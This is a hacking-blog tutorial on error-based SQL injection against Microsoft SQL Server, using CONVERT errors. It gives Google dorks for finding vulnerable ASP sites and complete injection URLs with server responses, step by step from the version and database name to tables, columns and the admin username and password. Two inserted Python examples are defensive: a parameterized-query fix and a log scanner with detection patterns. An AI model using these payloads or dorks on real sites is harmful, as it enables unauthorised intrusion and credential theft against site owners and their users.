MS sql injection tutorial

So guys, we have already hacked many SQLi and MySQL injection sites. Now it's time to target Microsoft. In this post I'll tell you how to hack MSSQL sites.



There are various types of SQL injection for Microsoft SQL Server, as follows:

1) ODBC Error Message Attack with "CONVERT"
2) ODBC Error Message Attack with "HAVING" and "GROUP BY"
3) MSSQL Injection with UNION Attack
4) MSSQL Injection in Web Services (SOAP Injection)
5) MSSQL Blind SQL Injection Attack
Here I'm going to explain the first one, "SQL injection with CONVERT".

STEP 1:

First we need to find a vulnerable site. Add a single quote ('), a double quote (") or a semicolon (;) to the parameter under test.

e.g.:
http://www.example.com/news.asp?id=10'
http://www.example.com/news.asp?id=10;

The page is vulnerable to SQL injection if the output shows an error like this:

[HTTP Response]------------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------

The error could also look something like the following:

Microsoft OLE DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
..../ main_rub.asp, line 4

If errors like the above are shown, the site may be vulnerable to SQL injection.
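The reason a stray quote produces that "Unclosed quotation mark" error is that the page builds its SQL statement by string concatenation, so the quote becomes part of the statement instead of part of the value. Below is an added illustration (my own code, not from this post) of that vulnerable pattern next to the fix: validate the parameter's type and bind it. It uses SQLite, which ships with Python, as a stand-in for SQL Server; the news table and its rows are constructed for the demo.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the table behind news.asp?id=...
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", [(10, "Ten"), (11, "Eleven")])
    return conn


def lookup_vulnerable(conn, raw_id):
    # Vulnerable pattern: the request parameter is pasted into the SQL text,
    # so id=10' yields ... WHERE id = '10'' and the statement no longer parses.
    sql = "SELECT title FROM news WHERE id = '" + raw_id + "'"
    try:
        row = conn.execute(sql).fetchone()
        return ("ok", row[0] if row else None)
    except sqlite3.OperationalError as exc:
        # Sending the driver's message to the browser is exactly the disclosure
        # the ODBC error pages in this post rely on; log it server-side instead.
        return ("db_error", str(exc))


def lookup_parameterized(conn, raw_id):
    # Fix: check that the parameter really is an integer, then bind it.
    # A quote can no longer alter the statement; it is rejected as not-an-int.
    try:
        news_id = int(raw_id)
    except ValueError:
        return ("rejected", None)
    row = conn.execute("SELECT title FROM news WHERE id = ?", (news_id,)).fetchone()
    return ("ok", row[0] if row else None)


if __name__ == "__main__":
    db = make_db()
    for probe in ("10", "10'", "10;"):
        print(repr(probe), lookup_vulnerable(db, probe), lookup_parameterized(db, probe))
```

Run it and compare the two columns: the concatenated query fails with a parser error on `10'`, while the parameterized lookup either answers normally or rejects the input without ever touching the database.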

You can also find vulnerable sites with a Google dork.

e.g.

inurl:age.asp?id=
inurl:index.asp?sid=
You can see more SQL dorks in my old posts.
STEP 2:

Now we have our vulnerable website.
The CONVERT function converts a value from one data type to another, and when the value cannot be converted to the target type SQL Server returns an error that quotes the offending value.

Now we start our assessment by finding the MSSQL version and the database name.

http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)

[http response]-------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
(Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.

/includes/templates/header.asp, line 21

-----------------------------------------------------------

We now know it's Microsoft SQL Server 2005 on Windows Server 2003 (Windows NT 5.2, Build 3790: Service Pack 2).

Let's enumerate the database name.

http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--

[http response]--------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'IPC' to data type int.

/includes/templates/header.asp, line 21
------------------------------------------------------------

The data base name is IPC.

http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'ipcdc' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

The current database user is ipcdc.


STEP 3:

Now let's find the tables in the database.

http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--

"information_schema.tables" stores information about the tables in the database, and it has a column called "table_name"
which holds the name of each table. "SELECT TOP 1" returns the first table in the database.
The result of this request is something like this:

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'siteStatus' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

Therefore, from this error we know the first table is "siteStatus". The next step is looking for the second table.
We just append a WHERE clause to the query in the above request:
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus')))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

Second table: 'headerGraphic'
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus','headerGraphic')))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'admin' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
Third table: 'admin'

Like this you will get each table name from the error.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus','headerGraphic','admin')))--

If the query returns something like this:

[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22

-----------------------------------------------------------------

It means the database contains only 3 tables: 'siteStatus', 'headerGraphic' and 'admin'.


STEP 4:

Now we are all set, and we will find the columns in the admin table.

We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name",
but we have to add "table_name" to the WHERE clause in order to specify the table we will pull column names from.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='admin'))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'username' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='admin'+and+column_name+not+in+('username')))--

The response will be:
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'passwd' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
So the 2nd column is 'passwd'.


Do this just like the URL manipulation we did for tables.
Don't forget to add the WHERE clause, and keep going until you get an error like this:

[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22

-----------------------------------------------------------------


STEP 5: RETRIEVING USERNAME AND PASSWORD

Now let's see what we got from above.

table_name: 'admin', 'siteStatus' and 'headerGraphic'

Here we are interested in 'admin', so we found the columns of 'admin':

column_name: 'username' and 'passwd'

Let's do our work now.

http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+username+from+admin))--
You will get the first username in the error message, e.g. sa_admin.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+passwd+from+admin))--

You will get the password, e.g. comic123.


So you own the MSSQL server with:

USERNAME: sa_admin
PASSWORD: comic123

Note:
1) You can use AND or OR; both work.
2) Don't forget the , (comma) after 'int' in convert().
3) In the error, the value after the ' (single quote) is your table_name, column_name, etc.
4) You can enumerate more usernames and passwords by using the 'not in' clause.
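On the defending side, the whole walk in steps 2 to 5 leaves a very regular trail: requests containing convert(int, ..., lookups against information_schema, not in (...) lists that grow by one name per request, and error responses that quote the extracted value. The following added example (my own code, not from this post) scans constructed IIS-style W3C log lines for those request signatures, counts flagged requests per client, and checks a response body for the verbose conversion error that discloses data. The log field order, the sample lines and the signature names are my assumptions, built for this demo.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures of the CONVERT error-based enumeration described in this post.
# They are matched against the URL-decoded query string, case-insensitively.
REQUEST_SIGNATURES = {
    "convert_to_int": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "schema_enumeration": re.compile(r"information_schema\.(tables|columns)", re.I),
    "server_metadata": re.compile(r"@@version|db_name\s*\(|user_name\s*\(", re.I),
    "not_in_walk": re.compile(r"not\s+in\s*\(", re.I),
}

# Response-side signature: the verbose OLE DB conversion error that quotes a value.
LEAK_PATTERN = re.compile(
    r"Conversion failed when converting the \w+ value '(.*?)' to data type int",
    re.S,
)

# Constructed sample in W3C extended format (assumed field order, see #Fields line).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-05-01 10:00:01 203.0.113.5 GET /page.asp id=1 200
2010-05-01 10:00:07 203.0.113.5 GET /page.asp id=1+and+1=convert(int,@@version) 500
2010-05-01 10:00:12 203.0.113.5 GET /page.asp id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
2010-05-01 10:00:19 203.0.113.5 GET /page.asp id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus')))-- 500
2010-05-01 10:01:03 198.51.100.9 GET /news.asp id=10 200
"""


def classify_request(url):
    """Return the set of signature names that fire on one request URL."""
    query = url.split("?", 1)[1] if "?" in url else ""
    decoded = unquote_plus(query)  # '+' -> space, %xx -> byte: what the database sees
    return {name for name, rx in REQUEST_SIGNATURES.items() if rx.search(decoded)}


def scan_log(lines):
    """Parse W3C-style lines and return one finding per request that trips a signature."""
    findings = []
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue  # directive or blank line
        parts = line.split()
        if len(parts) < 7:
            continue  # malformed line; a real pipeline would count these
        _date, _time, ip, _method, stem, query, status = parts[:7]
        url = stem if query == "-" else stem + "?" + query
        hits = classify_request(url)
        if hits:
            findings.append({"ip": ip, "url": url, "status": status, "hits": sorted(hits)})
    return findings


def requests_per_ip(findings):
    """Count flagged requests per client; one IP walking tables a name at a time stands out."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


def leaked_value(response_body):
    """Return the value a verbose conversion error discloses, or None if the body is clean."""
    m = LEAK_PATTERN.search(response_body)
    return m.group(1) if m else None


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for f in found:
        print(f["ip"], f["status"], f["hits"], f["url"])
    print(requests_per_ip(found))
    print(leaked_value("Conversion failed when converting the nvarchar value 'IPC' to data type int."))
```

The request signatures are what a WAF or SIEM rule would key on; the response check is the complementary control, useful for confirming after the fact what a verbose error page actually disclosed. The durable fix is the one from step 1: parameterized queries plus custom error pages, so that conversion errors never reach the client.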










© Copyright 2010-2011 Learn How To Hack! Learn Ethical Hacking & Download Free Hacking Softwares All Rights Reserved.